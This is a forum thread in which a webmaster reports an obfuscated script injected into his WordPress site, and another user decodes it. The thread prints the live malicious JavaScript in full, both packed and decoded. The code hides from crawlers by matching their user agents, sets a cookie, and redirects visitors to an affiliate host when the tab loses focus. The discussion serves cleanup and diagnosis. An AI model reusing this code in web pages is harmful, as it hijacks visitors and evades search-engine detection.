|
|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
 |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
10-23-2016, 01:05 AM
|
#1 |
|
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 3,065
|
Found a script in my site
This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.
Gonna update my wordpress sites. Change my password. Any other ideas? Here is the code I found. Thanks. Code:
<br></br><br></br>
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3=1N;c=z;b.1M=d(){3=1L(d(){4(c==z){x 5=D 1J();5.1K(5.1O()+B*B*24*7*1P);x u=D 1U("(1T\\/|G-1S|G-1Q|k 1R|1I-k|1H|1y|1z|1x|1w|1u-1v|1A-1B|1G|1F|1E|1C|1D|1V|o-1W|o 2g 2f|2e|2c|2d|2h|2i|2n|2m|2l|2j|2k |2b|2a|1t.l|20|1Z|1X|1Y|22|23.E|29|28|27|25|26|2o|L-N|H|J|t|W|S|T|Y|U|V|11 9|Z|Q|X|12|M|P|O|I|K|R|1s|1l|1k|1j|1h|1i|t|1m.13|1r|1q|1p|1o.l|1g.9|18 2|17|16|14|15|19|1a|1e|1c|1b|1d|1f|1n|21|2G|3B|3A-a|3z|3x|3y|3C|3D|3I|3H|3G|3E|3F|3w|2p|v v a|q-p-C.n.r|3v|3n|3m|3l 2 a|3j|3k-3o|3p-3u-2|3t-q-2.n|3s.3q|3K|3J|3Z|47|42|43:41|45-r|49|48|46|44|40|3P 3Q 3O|3N 3L 3M|3R.C|3S|3X|3Y|3W-2|3V|3T|3U|h|3r|3h|E.2I|2H-3i|2E|2F|h|2J|2K|2P|2O|2N|2L|2M|2D|2C|2u|p.2t|2s|2q|2r|2v|2w|2B|2A|y!j-2z|2x 2y-2Q 9|2R)",\'i\');4(!u.3a(39.38)&&f.e.36("g")==-1){f.e="g=1; 37="+5.3b()+"; 3c=/";4(s.3g((s.3f()*10))<10){b.3e.3d("\\35\\F\\F\\34\\2W\\0\\0\\8\\6\\w\\A\\2V\\2U\\A\\2S\\2T\\6\\2X\\8\\0\\8\\6\\0\\w\\2Y\\m\\33\\0\\m")}}c=32}},31)};b.2Z=d(){4(3){30(3)}};',62,258,'x2f||crawler|blur_started1|if|now|x6f||x67|Bot|spider|window|switch_flag1|function|cookie|document|__potus001|Twitterbot|||Google|org|x31|com|FAST|archive|web|bot|Math|dotbot|re|gnam|x32|var||false|x63|60|net|new|bnf|x74|Googlebot|tagoobot|postrank|MJ12bot|turnitinbot|ips|citeseerxbot|agent|twengabot|spbot|CyberPatrol|scribdbot|yanga|buzzbot|yandexbot|purebot|woriobot|voilabot|mlbot|Voyager||Linguee|baiduspider|RU_Bot|domaincrawler|wbsearchbot|Aboundex|ahrefsbot|sistrix|summify|ccbot|ec2linkfinder|seznambot|gslfbot|edisterbot|aihitbot|NerdByNature|blekkobot|ezooms|Adidxbot|linkdex|sitebot|Mail|intelium_bot|europarchive|findthatfile|heritrix|discobot|page2rss|grub|Commons|HttpClient|curl|wget|slurp|java|Python|urllib|phpcrawl|msnbot|nutch|httpunit|libwww|bingbot|Mediapartners|Date|setTime|setTimeout|onblur|null|getTime|1000|Image|favicon|Mobile|googlebot|RegExp|jyxobot|WebCrawler|netresearchserver|speedy|antibot|UsineNouvelleCrawler|facebookexternalhit|fluffy|bibnum||yacybot|AISearchBot|panscient|msrbot|findlink|webcrawler|httrack|teoma|convera|biglotron|Crawler|Enterprise|seekbot|gigablast|GingerCrawler|webmon|ia_archiver|ngbot|exabot|IOI|openindexspider|TweetmemeBot|crawler4j|Applebot|org_bot|Qwantify|findxbot|SemrushBot|Domain|Re|asr|lipperhey|yoozBot|BUbiNG|xovibot|ADmantX|Facebot|yeti|A6|fr_bot|OrangeBot|memorybot|ltx71|nerdybot|SemanticScholarBot|MegaIndex|AdvBot|Animator|AddThis|x6b|x2e|x69|x6c|x3a|x72|x36|onfocus|clearTimeout|5000|true|x37|x70|x68|indexOf|expires|userAgent|navigator|test|toUTCString|path|replace|location|random|floor|smtbot|Indexer|toplistbot|seokicks|content|integromedb|coccoc|robot|it2media|info|cXensebot|siteexplorer|ip|domain|backlinkcrawler|acoonbot|lssbot|careerbot|sogou|lb|RetrevoPageAnalyzer|wotbox|wocbot|drupact|webcompanycrawler|lssrocketcrawler|DuckDuckBot|ichiro|proximic|elisabot|Metadata|Scaper|CC|Service|Lipperhey|SEO|g00g1e|GrapeshotCrawler|SimpleCrawler|Livelapbot|binlar|fr|urlappendbot|brainobot|changedetection|InterfaxScanBot|Search|arabot|WeSEE|psbot|niki|360Spider|blexbot|rogerbot|CrystalSemanticsBot'.split('|'),0,{}));</script>
__________________
Live Sex Shows |
|
|
|
10-23-2016, 02:01 AM
|
#2 | |
|
So fuckin' bored
Industry Role:
Join Date: Jun 2003
Posts: 32,381
|
Quote:
Code:
blur_started1 = null;
switch_flag1 = false;
window.onblur = function(){blur_started1 = setTimeout(function(){if(switch_flag1==false){var now = new Date();
now.setTime(now.getTime()+60*60*24*7*1000);
var re = new RegExp("(googlebot\/|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)", 'i');
if(!re.test(navigator.userAgent)&&document.cookie.indexOf("__potus001")==-1){document.cookie = "__potus001=1; expires="+now.toUTCString()+"; path=/";
if(Math.floor((Math.random()*10))<10){window.location.replace("http://go2click.org/go/2617/1")}}switch_flag1 = true}}, 5000)};
window.onfocus = function(){if(blur_started1){clearTimeout(blur_started1)};
P.S. Your site has been hacked.
__________________
Obey the Cowgod |
|
|
|
|
|
10-23-2016, 02:18 AM
|
#3 | |
|
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 3,065
|
Quote:
Yep. the go2click redirects to iwantu.com/aff.php?dynamicpage=iwu_wlp_5st_tmr_a&a_bid=dc57a3 f7&utm_sub=opnfnl&utm_source=int&utm_medium=web&ut m_campaign=476cb13b&utm_content=2617&data2=06pvh21 bg0082 Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know
__________________
Live Sex Shows |
|
|
|
|
|
10-23-2016, 02:24 AM
|
#4 | |
|
So fuckin' bored
Industry Role:
Join Date: Jun 2003
Posts: 32,381
|
Quote:
__________________
Obey the Cowgod |
|
|
|
|
|
10-23-2016, 04:39 AM
|
#5 | |
|
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 3,065
|
Quote:
Noticed no world writable directories. find . -type d -perm -o=w And no logins from any other ips over the past month. I used the command last -if /var/log/wtmp.1 | grep youruser | awk '{print $3}' | sort | uniq -c Just gotta keep looking through the logs.
__________________
Live Sex Shows |
|
|
|
|
|
10-23-2016, 10:14 PM
|
#6 |
|
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 3,065
|
oh well. Searched all through my logs but I couldn't find when this happened. I e-mailed iwantu.org support. Hoping they could help me some with a time frame. But I notice the go2click.org link redirects to different sites.
I scanned my computer for malware, None found. I went ahead and updated php 5.5 to 5.6. Weird timing causing dreamhost just moved me to a new server this evening. Just gonna keep an eye on the files and see if they get modified again. Then I will no where to look in the logs. On a positive note. I have learned much today. First time I have used putty to connect to my web server to get a shell. Learned some about PHP hacking.
__________________
Live Sex Shows |
|
|
|
|
|
|||||||
|
|||||||
| Bookmarks |
